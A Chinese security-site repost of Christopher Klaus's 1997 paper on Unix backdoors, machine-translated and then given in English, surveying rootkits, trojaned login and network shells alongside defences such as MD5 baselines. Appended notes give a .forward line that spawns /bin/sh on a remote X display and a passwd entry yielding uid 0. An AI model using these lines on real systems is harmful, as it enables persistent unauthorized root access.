后门.

txt.

释放双眼,带上耳机,听听看~!

backdoors.txt,

1997年8月4日克里斯托弗·克劳斯的backdoors.

txt,tags | paper,backdoors,自从入侵计算机的早期以来,他们一直在尝试开发技术或后门,使他们能够重新进入系统.

在本文中,我们将重点介绍许多常见的后门以及检查它们的可能方法.

大部分的焦点将放在Unix后门上,并讨论未来的Windows NT后门.

这将描述在试图确定入侵者使用的方法中的问题的复杂性,以及管理员理解他们如何能够阻止入侵者返回的基础.

当管理员知道一旦入侵者进入,阻止他们进入有多困难时,更容易理解主动阻止入侵者进入的好处.

这是为了涵盖许多流行的常用后门初学者和先进的入侵者.

这并不是要涵盖所有可能的方法来创建后门,因为可能性是无限的.

对于大多数入侵者来说,后门提供了两到三个主要功能:即使管理员试图保护机器,也能回到机器中,例如,更改所有密码.

能够以最少的能见度回到机器中.

大多数后门程序都提供了一种避免被记录的方法,很多时候,即使入侵者正在使用它,机器也可能看起来没有人在线.

能够用最少的时间回到机器里.

大多数入侵者都想轻松地回到机器中,而不必为了进入机器而挖洞.

在某些情况下,如果入侵者可能认为管理员可能会检测到任何已安装的后门,则他们将反复使用该漏洞作为唯一的后门进入计算机.

这样就不会触碰任何可能向管理员告密的东西.

因此,在某些情况下,计算机上的漏洞仍然是唯一未被注意的后门.

密码破解后门是入侵者最早也是最古老的方法之一,它不仅可以访问Unix机器,而且还可以运行密码破解器.

这就暴露了一些不可靠的密码账户.

现在,即使系统管理员锁定了入侵者的当前帐户,所有这些新帐户都有可能进入计算机的后门.

很多时候,入侵者会使用简单的密码查找未使用的帐户,并将密码更改为困难的密码.

当管理员查找所有弱密码帐户时,将不会显示密码已修改的帐户.

因此,管理员将无法轻松确定要锁定哪些帐户.

Rhosts++在联网的Unix机器上,Rsh和Rlogin等服务使用了一种基于Rhosts中出现的主机名的简单身份验证方法.

用户可以轻松配置哪些计算机不需要密码登录.

如果入侵者访问了某人的rhosts文件,则可以在该文件中添加“++”,这将允许来自任何地方的任何人在没有密码的情况下登录到该帐户.

许多入侵者使用这种方法,特别是当NFS向世界导出主目录时.

这些帐户成为入侵者返回系统的后门.

许多入侵者更喜欢使用Rsh而不是Rlogin,因为它常常缺乏任何日志记录功能.

许多管理员检查“++”,因此入侵者实际上可能会从网络上的另一个受损帐户输入主机名和用户名,因此不太容易发现.

早期,许多入侵者使用自己的特洛伊木马版本替换二进制文件.

许多系统管理员依靠时间戳和系统校验和程序(如Unix的sum程序)来确定二进制文件何时被修改.

入侵者开发了一种技术,可以为特洛伊木马程序文件重新创建与原始文件相同的时间戳.

这是通过将系统时钟时间设置回原始文件的时间,然后将特洛伊木马程序文件的时间调整为系统时钟来完成的.

一旦二进制特洛伊木马程序文件与原始文件具有完全相同的时间,系统时钟i重置为当前时间.

sum程序依赖于CRC校验和,很容易被欺骗.

入侵者开发了一些程序,可以修改特洛伊木马二进制文件,使其具有必要的原始校验和,从而愚弄管理员.

MD5校验和是目前大多数供应商推荐使用的选项.

MD5是基于一种算法,迄今为止还没有人证明这种算法可以被欺骗.

在Unix上,登录程序是一种软件,当某人远程登录到计算机时,它通常执行密码验证.

入侵者抓取源代码login.

c并修改它,使其在登录时将用户密码与存储的密码进行比较时,首先检查后门密码.

如果用户输入了后门密码,那么无论管理员将密码设置为什么,它都允许您登录.

因此,这允许入侵者登录到任何帐户,甚至根.

在用户实际登录并以utmp和wtmp形式出现之前,密码后门将产生访问权限.

因此,入侵者可以登录并拥有shell访问权限,而不会显示该计算机上有任何人作为该帐户.

管理员开始注意到这些后门,特别是当他们使用“strings”命令查找登录程序中的文本时.

很多时候后门密码会出现.

入侵者然后加密或隐藏后门密码更好,这样它就不会出现在仅仅做字符串.

许多管理员可以使用MD5校验和检测这些后门.

Telnetd后门当用户远程登录到计算机时,inetd服务侦听端口并接收连接,然后将其传递给in.

Telnetd,后者随后运行登录.

一些入侵者知道管理员正在检查登录程序是否有篡改,因此他们在.

telnetd中进行了修改.在in.telnetd中,它会从用户那里进行多次检查,以确定用户使用的是哪种终端.

通常,终端设置可以是Xterm或VT100.

入侵者可以后门,这样当终端设置为“letmein”时,它将生成一个shell,而不需要任何身份验证.

入侵者已经在后门设置了一些服务,以便来自特定源端口的任何连接都可以生成一个shell.

服务后门几乎所有的网络服务都曾一度被入侵者后门.

finger、rsh、rexec、rlogin、ftp、甚至inetd等的后门版本一直在流传.

有些程序只不过是一个shell,它连接到一个TCP端口,可能有一个后门密码来获取访问权限.

这些程序有时会替换像uucp这样永远不会被使用的服务,或者作为新服务添加到inetd.

conf文件中.

管理员应该非常小心哪些服务正在运行,并通过MD5校验和分析原始服务.

Cronjob在Unix上的后门Cronjob安排了应该运行某些程序的时间.

入侵者可以在凌晨1点到2点之间添加一个后门shell程序.

因此,入侵者每晚有1小时可以进入.

入侵者还研究了通常在cronjob中运行的合法程序,并在这些程序中构建了后门.

几乎每个UNIX系统都使用共享库.

共享库旨在重用许多相同的例程,从而减少程序的大小.

一些入侵者已经后门了crypt.

c和crypt.

c等一些例程.login.c等程序将使用crypt()例程,如果使用后门密码,则会生成一个shell.

因此,即使管理员正在检查登录程序的MD5,它仍然在生成一个后门例程,并且许多管理员没有检查库作为后门的可能来源.

对于许多入侵者来说,一个问题是一些管理员启动了几乎所有内容的MD5校验和.

入侵者用来绕过的一种方法是后门打开()和文件访问例程.

后门程序被配置为读取原始文件,但执行特洛伊木马程序后门.

因此,当MD5校验和程序读取这些文件时,校验和看起来总是很好的.

但是当系统运行程序时,它执行了trojan版本.

即使是特洛伊木马程序库本身,也可能隐藏在MD5校验和中.

管理员可以绕过这个后门的一种方法是静态链接MD5校验和检查器并在系统上运行.

静态链接程序不使用特洛伊木马共享库.

内核后门Unix上的内核是Unix工作方式的核心.

用于库绕过MD5校验和的相同方法可以在内核级别使用,只是即使是静态链接的程序也无法区分这一区别.

一个好的后门内核可能是管理员最难找到的,幸运的是,内核后门脚本还没有被广泛提供,没有人知道它们到底有多广泛.

文件系统后门入侵者可能想把他们的战利品或数据存储在某个服务器上,而管理员没有找到这些文件.

入侵者的文件通常可以包含开发脚本、后门、嗅探器日志、复制的数据(如电子邮件消息、源代码等)的工具箱,以将这些大型文件隐藏在管理员手中,入侵者可以修补文件系统命令,如“LS”、“DU”和“FSCK”,以隐藏某些目录或文件的存在.

在一个非常低的级别上,一个入侵者的后门在硬盘上创建了一个分区,以拥有被指定为硬盘上“坏”扇区的专有格式.

因此,入侵者只需使用特殊工具就可以访问这些隐藏文件,但是对于常规管理员来说,很难确定标记为“坏”的扇区是否确实是隐藏文件系统的存储区域.

Bootblock后门在PC世界,许多病毒已经隐藏在Bootblock部分,大多数杀毒软件将检查Bootblock是否已被更改.

在Unix上,大多数管理员没有任何检查引导块的软件,因此一些入侵者在引导块区域隐藏了一些后门.

进程隐藏后门入侵者多次想隐藏他们正在运行的程序.

他们想要隐藏的程序通常是密码破解器或嗅探器.

有很多方法,这里有一些更常见的方法:入侵者可以编写程序来修改自己的argv[],使其看起来像另一个进程名.

入侵者可以将嗅探器程序重命名为合法的服务,如in.

syslog并运行它.

因此,当管理员执行“ps”或查看正在运行的内容时,将显示标准服务名称.

入侵者可以修改库例程,使“ps”不显示所有进程.

入侵者可以将后门或程序修补到中断驱动的例程中,这样它就不会出现在进程表中.

使用此技术的后门示例是http://star.niimm.spb.su/~maillist/bugtraq.

1/0777.

html上提供的amod.tar.gz,入侵者可以修改内核以隐藏某些进程.

Rootkit最流行的安装后门的软件包之一是Rootkit.

它可以很容易地定位使用网络搜索引擎.

在Rootkit自述文件中,以下是安装的典型文件:z2-从utmp、wtmp和lastlog中删除条目.

Es-rokstar的基于sun4内核的以太网嗅探器.

修复-尝试伪造校验和,安装与相同的日期/perms/u/g.

Sl-成为根通过一个魔术密码发送到登录.

Ic-修改ifconfig以从输出中删除PROMISC标志.

ps:-隐藏进程.

Ns-修改netstat以隐藏到某些计算机的连接.

Ls-隐藏某些目录和文件以防被列出.

du5-隐藏硬盘上正在使用的空间.

ls5-隐藏某些文件和目录.

网络流量后门不仅是入侵者想在机器上隐藏他们的踪迹,而且他们还想尽可能地隐藏他们的网络流量.

这些网络流量后门有时允许入侵者通过防火墙访问.

有许多网络后门程序允许入侵者在一台机器上的某个端口号上设置,这将允许在不经过正常服务的情况下进行访问.

由于流量将流向非标准网络端口,管理员可以忽略入侵者的交通.

这些网络流量后门通常使用TCP、UDP和ICMP,但也可能是许多其他类型的数据包.

TCP Shell后门入侵者可以在某些高端口号上设置这些tcpshell后门,可能防火墙没有阻止该TCP端口.

很多时候,它们都会受到密码保护,这样连接到它们的管理员就不会立即看到shell访问.

管理员可以使用netstat查找这些连接,以查看监听的端口以及当前连接的往返位置.

很多时候,这些后门允许入侵者通过TCP包装技术.

这些后门可以在SMTP端口上运行,许多防火墙都允许通过该端口发送电子邮件.

UDP Shell后门管理员可以多次发现TCP连接并注意到奇怪的行为,而udpshell后门缺少任何连接,因此netstat不会显示有入侵者访问Unix机器.

许多防火墙已配置为允许UDP包用于DNS等服务.

很多时候,入侵者会将UDP外壳后门放在该端口上,并允许它绕过防火墙.

ICMP Shell后门Ping是通过发送和接收ICMP数据包来确定计算机是否活动的最常用方法之一.

许多防火墙允许外部人员ping内部机器.

入侵者可以将数据放入Ping ICMP包中,并在Ping机器之间建立一个shell隧道.

管理员可能会注意到一系列Ping数据包,但除非管理员查看数据包中的数据,否则入侵者可能不会被注意到.

加密链接管理员可以设置一个嗅探器,试图查看数据显示为某人访问外壳,但入侵者可以在网络流量后门添加加密,几乎不可能确定两台计算机之间实际传输的是什么.

Windows NT由于windowsnt不容易允许多个用户在同一台机器上进行远程访问,与Unix类似,入侵者很难侵入windowsnt,安装后门,并从中发起攻击.

因此,与Windows NT相比,Unix系统中的网络攻击更频繁.

随着Windows NT在多用户技术上的进步,这可能会给使用windowsnt的入侵者带来更高的频率.

如果真的发生了这种情况,许多Unix后门的概念都可以移植到Windows NT上,管理员也可以为入侵者做好准备.

现在,已经有了用于Windows NT的telnet守护进程.

有了网络流量后门,入侵者可以在Windows NT上安装它们.

解决方案随着后门技术的进步,管理员更难确定入侵者是否已进入或是否已成功锁定.

评估是主动性的第一步之一是评估你的网络是多么脆弱,从而能够找出哪些漏洞是应该被修复的.

许多商业工具用于帮助扫描和检查网络和系统的漏洞.

许多公司如果只安装由其供应商免费提供的安全修补程序,就可以极大地提高其安全性.

MD5基线系统扫描仪的一个必要组件是MD5校验和基线.

这个MD5基线应该在黑客攻击干净系统之前建立起来.

一旦黑客进入并安装了后门,尝试在事实发生后创建一个基线可以将后门合并到基线中.

数家公司遭到黑客攻击,并在其系统上安装了数月的后门.

随着时间的推移,系统的所有备份都包含了后门.

当这些公司中的一些发现他们有黑客时,他们恢复了一个备份,希望移除任何后门.

这项工作是徒劳的,因为他们正在恢复所有的文件,甚至是后门的文件.

在攻击发生之前,需要进行二进制基线比较.

入侵检测入侵检测变得越来越重要,因为组织正在连接并允许连接到他们的一些机器.

大多数老年人入侵检测技术是基于日志的事件.

最新的入侵检测系统(IDS)技术基于实时嗅探和网络流量安全分析.

许多网络流量后门现在很容易被发现.

最新的IDS技术可以查看DNS-UDP包并确定它是否与DNS协议请求匹配.

如果DNS端口上的数据与DNS协议不匹配,则可以发出警报标志并捕获数据以进行进一步分析.

同样的原理也可以应用于ICMP包中的数据,看看它是普通的ping数据还是携带加密的shell会话.

从CD-ROM启动.

一些管理员可能希望考虑从CD-ROM启动,从而消除入侵者在CD-ROM上安装后门的可能性.

此方法的问题是在企业范围内实现此解决方案的成本和时间.

警惕因为安全领域变化如此之快,每天都有新的漏洞被公布,入侵者不断设计新的攻击和后门技术,没有警惕,任何安全技术都是无效的.

要知道,没有防御是万无一失的,勤勉的注意力是无法替代的.

————————————————————————-您可能需要在Unix计算机上添加:.

forward Backdoor,将命令放入.

forward文件也是重新获得访问权限的常见方法.

对于帐户“username”,可以按如下方式构造一个.

forward文件:username |“/usr/local/X11/bin/xterm-disp hacksys.other.dom:0.0-e/bin/sh”此方法的排列方式包括更改系统邮件别名文件(通常位于/etc/aliases).

注意,这是一个简单的排列,越高级的可以从转发文件运行一个简单的脚本,该脚本可以通过stdin接受任意命令(在小的预处理之后).

PS:上述方法对于访问公司mailhub也很有用(假设客户机和服务器上有一个共享的主目录FS).

>使用smrsh可以有效地消除这种后门(尽管如果您允许elm’s filter或procmail这样可以自己运行程序的东西,它很可能仍然是一个问题……).

—————————————————————————您可能需要添加这个可以充当后门的“功能”:在/etc/password文件中指定错误的uid/gid时,大多数登录(1)实现将无法检测到错误的uid/gid,而atoi(3)将uid/gid设置为0,从而授予超级用户权限.

示例:R Martin:x:x50:50:R.

Martin:/home/rmartin:/bin/tcsh在Linux框上,这将向用户rmartin提供uid 0.

,网络安全教程backdoors.txt,tags |
paper,
Backdoors

By Christopher Klaus 8/4/97

Since the early days of intruders breaking into computers, they have tried
to develop techniques or backdoors that allow them to get back into the
system. In this paper, it will be focused on many of the common backdoors
and possible ways to check for them. Most of focus will be on Unix
backdoors with some discussion on future Windows NT backdoors. This will
describe the complexity of the issues in trying to determine the methods
that intruders use and the basis for administrators understanding on how
they might be able to stop the intruders from getting back in. When an
administrator understands how difficult it would be to stop intruder once
they are in, the appreciation of being proactive to block the intruder from
ever getting in becomes better understood. This is intended to cover many
of the popular commonly used backdoors by beginner and advanced intruders.
This is not intended to cover every possible way to create a backdoor as
the possibilities are limitless.

The backdoor for most intruders provide two or three main functions:

Be able to get back into a machine even if the administrator tries to
secure it, e.g., changing all the passwords.

Be able to get back into the machine with the least amount of visibility.
Most backdoors provide a way to avoid being logged and many times the
machine can appear to have no one online even while an intruder is using
it.

Be able to get back into the machine with the least amount of time. Most
intruders want to easily get back into the machine without having to do all
the work of exploiting a hole to gain access.

In some cases, if the intruder may think the administrator may detect any
installed backdoor, they will resort to using the vulnerability repeatedly
to get on a machine as the only backdoor. Thus not touching anything that
may tip off the administrator. Therefore in some cases, the
vulnerabilities on a machine remain the only unnoticed backdoor.

Password Cracking Backdoor

One of the first and oldest methods of intruders used to gain not only
access to a Unix machine but backdoors was to run a password cracker. This
uncovers weak passworded accounts. All these new accounts are now possible
backdoors into a machine even if the system administrator locks out the
intruder's current account. Many times, the intruder will look for unused
accounts with easy passwords and change the password to something
difficult. When the administrator looked for all the weak passworded
accounts, the accounts with modified passwords will not appear. Thus the
administrator will not be able to easily determine which accounts to lock
out.

Rhosts + + Backdoor

On networked Unix machines, services like Rsh and Rlogin used a simple
authentication method based on hostnames that appear in rhosts. A user
could easily configure which machines not to require a password to log
into. An intruder that gained access to someone's rhosts file could put a
"+ +" in the file and that would allow anyone from anywhere to log into
that account without a password. Many intruders use this method especially
when NFS is exporting home directories to the world. These accounts
become backdoors for intruders to get back into the system. Many intruders
prefer using Rsh over Rlogin because it is many times lacking any logging
capability. Many administrators check for "+ +" therefore an intruder may
actually put in a hostname and username from another compromised account on
the network, making it less obvious to spot.

Checksum and Timestamp Backdoors

Early on, many intruders replaced binaries with their own trojan versions.
Many system administrators relied on time-stamping and the system checksum
programs, e.g., Unix's sum program, to try to determine when a binary file
has been modified. Intruders have developed technology that will recreate
the same time-stamp for the trojan file as the original file. This is
accomplished by setting the system clock time back to the original file's
time and then adjusting the trojan file's time to the system clock. Once
the binary trojan file has the exact same time as the original, the system
clock is reset to the current time. The sum program relies on a CRC
checksum and is easily spoofed. Intruders have developed programs that
would modify the trojan binary to have the necessary original checksum,
thus fooling the administrators. MD5 checksums is the recommended choice
to use today by most vendors. MD5 is based on an algorithm that no one has
yet to date proven can be spoofed.

Login Backdoor

On Unix, the login program is the software that usually does the password
authentication when someone telnets to the machine. Intruders grabbed the
source code to login.c and modified it that when login compared the user's
password with the stored password, it would first check for a backdoor
password. If the user typed in the backdoor password, it would allow you to
log in regardless of what the administrator sets the passwords to. Thus
this allowed the intruder to log into any account, even root. The
password backdoor would spawn access before the user actually logged in and
appeared in utmp and wtmp. Therefore an intruder could be logged in and
have shell access without it appearing anyone is on that machine as that
account. Administrators started noticing these backdoors especially if
they did a "strings" command to find what text was in the login program.
Many times the backdoor password would show up. The intruders then
encrypted or hid the backdoor password better so it would not appear by
just doing strings. Many of the administrators can detect these backdoors
with MD5 checksums.

Telnetd Backdoor

When a user telnets to the machine, inetd service listens on the port and
receive the connection and then passes it to in.telnetd, that then runs
login. Some intruders knew the administrator was checking the login
program for tampering, so they modified in.telnetd. Within in.telnetd, it
does several checks from the user for things like what kind of terminal the
user was using. Typically, the terminal setting might be Xterm or VT100.
An intruder could backdoor it so that when the terminal was set to
"letmein", it would spawn a shell without requiring any authentication.
Intruders have backdoored some services so that any connection from a
specific source port can spawn a shell.

Services Backdoor

Almost every network service has at one time been backdoored by an
intruder. Backdoored versions of finger, rsh, rexec, rlogin, ftp, even
inetd, etc., have been floating around forever. There are programs that
are nothing more than a shell connected to a TCP port with maybe a backdoor
password to gain access. These programs sometimes replace a service like
uucp that never gets used or they get added to the inetd.conf file as a new
service. Administrators should be very wary of what services are running
and analyze the original services by MD5 checksums.

Cronjob backdoor

Cronjob on Unix schedules when certain programs should be run. An intruder
could add a backdoor shell program to run between 1 AM and 2 AM. So for 1
hour every night, the intruder could gain access. Intruders have also
looked at legitimate programs that typically run in cronjob and built
backdoors into those programs as well.

Library backdoors

Almost every UNIX system uses shared libraries. The shared libraries are
intended to reuse many of the same routines thus cutting down on the size
of programs. Some intruders have backdoored some of the routines like
crypt.c and _crypt.c. Programs like login.c would use the crypt() routine
and if a backdoor password was used it would spawn a shell. Therefore,
even if the administrator was checking the MD5 of the login program, it was
still spawning a backdoor routine and many administrators were not checking
the libraries as a possible source of backdoors.

One problem for many intruders was that some administrators started MD5
checksums of almost everything. One method intruders used to get around
that is to backdoor the open() and file access routines. The backdoor
routines were configured to read the original files, but execute the trojan
backdoors. Therefore, when the MD5 checksum program was reading these
files, the checksums always looked good. But when the system ran the
program, it executed the trojan version. Even the trojan library itself,
could be hidden from the MD5 checksums. One way to an administrator could
get around this backdoor was to statically link the MD5 checksum checker
and run on the system. The statically linked program does not use the
trojan shared libraries.

Kernel backdoors

The kernel on Unix is the core of how Unix works. The same method used for
libraries for bypassing MD5 checksum could be used at the kernel level,
except even a statically linked program could not tell the difference. A
good backdoored kernel is probably one of the hardest to find by
administrators, fortunately kernel backdoor scripts have not yet been
widely made available and no one knows how wide spread they really are.

File system backdoors

An intruder may want to store their loot or data on a server somewhere
without the administrator finding the files. The intruder's files can
typically contain their toolbox of exploit scripts, backdoors, sniffer
logs, copied data like email messages, source code, etc. To hide these
sometimes large files from an administrator, an intruder may patch the
files system commands like "ls", "du", and "fsck" to hide the existence of
certain directories or files. At a very low level, one intruder's backdoor
created a section on the hard drive to have a proprietary format that was
designated as "bad" sectors on the hard drive. Thus an intruder could
access those hidden files with only special tools, but to the regular
administrator, it is very difficult to determine that the marked "bad"
sectors were indeed storage area for the hidden file system.

Bootblock backdoors

In the PC world, many viruses have hid themselves within the bootblock
section and most antivirus software will check to see if the bootblock has
been altered. On Unix, most administrators do not have any software that
checks the bootblock, therefore some intruders have hidden some backdoors
in the bootblock area.

Process hiding backdoors

An intruder many times wants to hide the programs they are running. The
programs they want to hide are commonly a password cracker or a sniffer.
There are quite a few methods and here are some of the more common:

An intruder may write the program to modify its own argv[] to make it look
like another process name.

An intruder could rename the sniffer program to a legitimate service like
in.syslog and run it. Thus when an administrator does a "ps" or looks at
what is running, the standard service names appear.

An intruder could modify the library routines so that "ps" does not show
all the processes.

An intruder could patch a backdoor or program into an interrupt driven
routine so it does not appear in the process table. An example backdoor
using this technique is amod.tar.gz available on
http://star.niimm.spb.su/~maillist/bugtraq.1/0777.html

An intruder could modify the kernel to hide certain processes as well.

Rootkit

One of the most popular packages to install backdoors is rootkit. It can
easily be located using Web search engines. From the Rootkit README, here
are the typical files that get installed:

z2 - removes entries from utmp, wtmp, and lastlog.
Es - rokstar's ethernet sniffer for sun4 based kernels.
Fix - try to fake checksums, install with same dates/perms/u/g.
Sl - become root via a magic password sent to login.
Ic - modified ifconfig to remove PROMISC flag from output.
ps: - hides the processes.
Ns - modified netstat to hide connections to certain machines.
Ls - hides certain directories and files from being listed.
du5 - hides how much space is being used on your hard drive.
ls5 - hides certain files and directories from being listed.

Network traffic backdoors

Not only do intruders want to hide their tracks on the machine, but also
they want to hide their network traffic as much as possible. These network
traffic backdoors sometimes allow an intruder to gain access through a
firewall. There are many network backdoor programs that allow an intruder
to set up on a certain port number on a machine that will allow access
without ever going through the normal services. Because the traffic is
going to a non-standard network port, the administrator can overlook the
intruder's traffic. These network traffic backdoors are typically using
TCP, UDP, and ICMP, but it could be many other kinds of packets.

TCP Shell Backdoors

The intruder can set up these TCP Shell backdoors on some high port number
possibly where the firewall is not blocking that TCP port. Many times,
they will be protected with a password just so that an administrator that
connects to it, will not immediately see shell access. An administrator
can look for these connections with netstat to see what ports are listening
and where current connections are going to and from. Many times, these
backdoors allow an intruder to get past TCP Wrapper technology. These
backdoors could be run on the SMTP port, which many firewalls allow traffic
to pass for e-mail.

UDP Shell Backdoors

Administrator many times can spot a TCP connection and notice the odd
behavior, while UDP shell backdoors lack any connection so netstat would
not show an intruder accessing the Unix machine. Many firewalls have been
configured to allow UDP packets for services like DNS through. Many times,
intruders will place the UDP Shell backdoor on that port and it will be
allowed to by-pass the firewall.

ICMP Shell Backdoors

Ping is one of the most common ways to find out if a machine is alive by
sending and receiving ICMP packets. Many firewalls allow outsiders to ping
internal machines. An intruder can put data in the Ping ICMP packets and
tunnel a shell between the pinging machines. An administrator may notice a
flurry of Ping packets, but unless the administrator looks at the data in
the packets, an intruder can be unnoticed.

Encrypted Link

An administrator can set up a sniffer trying to see data appears as someone
accessing a shell, but an intruder can add encryption to the Network
traffic backdoors and it becomes almost impossible to determine what is
actually being transmitted between two machines.

Windows NT

Because Windows NT does not easily allow multiple users on a single machine
and remote access similar as Unix, it becomes harder for the intruder to
break into Windows NT, install a backdoor, and launch an attack from it.
Thus you will find more frequently network attacks that are spring boarded
from a Unix box than Windows NT. As Windows NT advances in multi-user
technologies, this may give a higher frequency of intruders who use Windows
NT to their advantage. And if this does happen, many of the concepts from
Unix backdoors can be ported to Windows NT and administrators can be ready
for the intruder. Today, there are already telnet daemons available for
Windows NT. With Network Traffic backdoors, they are very feasible for
intruders to install on Windows NT.

Solutions

As backdoor technology advances, it becomes even harder for administrators
to determine if an intruder has gotten in or if they have been successfully
locked out.

Assessment

One of the first steps in being proactive is to assess how vulnerable your
network is, thus being able to figure out what holes exist that should be
fixed. Many commercial tools exist to help scan and audit the network and
systems for vulnerabilities. Many companies could dramatically improve
their security if they only installed the security patches made freely
available by their vendors.

MD5 Baselines

One necessary component of a system scanner is MD5 checksum baselines.
This MD5 baseline should be built up before a hacker attack with clean
systems. Once a hacker is in and has installed backdoors, trying to create
a baseline after the fact could incorporate the backdoors into the
baseline. Several companies had been hacked and had backdoors installed on
their systems for many months. Overtime, all the backups of the systems
contained the backdoors. When some of these companies found out they had
a hacker, they restored a backup in hopes of removing any backdoors. The
effort was futile since they were restoring all the files, even the
backdoored ones. The binary baseline comparison needs to be done before an
attack happens.

Intrusion detection

Intrusion detection is becoming more important as organizations are hooking
up and allowing connections to some of their machines. Most of the older
intrusion detection technology was log-based events. The latest intrusion
detection system (IDS) technology is based on real-time sniffing and
network traffic security analysis. Many of the network traffic backdoors
can now easily be detected. The latest IDS technology can take a look at
the DNS UDP packets and determine if it matches the DNS protocol requests.
If the data on the DNS port does not match the DNS protocol, an alert flag
can be signaled and the data captured for further analysis. The same
principle can be applied to the data in an ICMP packet to see if it is the
normal ping data or if it is carrying encrypted shell session.

Boot from CD-ROM.

Some administrators may want to consider booting from CD-ROM thus
eliminating the possibility of an intruder installing a backdoor on the
CD-ROM. The problem with this method is the cost and time of implementing
this solution enterprise wide.

Vigilant

Because the security field is changing so fast, with new vulnerabilities
being announced daily and intruders are constantly designing new attack and
backdoor techniques, no security technology is effective without vigilance.

Be aware that no defense is foolproof, and that there is no substitute for
diligent attention.

-------------------------------------------------------------------------

you may want to add:

.forward Backdoor

On Unix machines, placing commands into the .forward file was also
a common method of regaining access. For the account ``username''
a .forward file might be constructed as follows:

\username
|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh"

permutations of this method include alteration of the systems mail
aliases file (most commonly located at /etc/aliases). Note that
this is a simple permutation, the more advanced can run a simple
script from the forward file that can take arbitrary commands via
stdin (after minor preprocessing).

PS: The above method is also useful gaining access a companies
mailhub (assuming there is a shared a home directory FS on
the client and server).

> Using smrsh can effectively negate this backdoor (although it's quite
> possibly still a problem if you allow things like elm's filter or
> procmail which can run programs themselves...).

---------------------------------------------------------------------------

you may want to add this "feature" that can act as a backdoor:

when specifying a wrong uid/gid in the /etc/password file,
most login(1) implementations will fail to detect the wrong
uid/gid and atoi(3) will set uid/gid to 0, giving superuser
privileges.

example:
rmartin:x:x50:50:R. Martin:/home/rmartin:/bin/tcsh
on Linux boxes, this will give uid 0 to user rmartin.

人已赞赏
安全工具

<p>cidf.<p>txt文件.</p>

2020-2-6 3:17:45

安全工具

<p>NCSC-TG-007.txt文件.</p>

2020-2-6 3:17:50

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索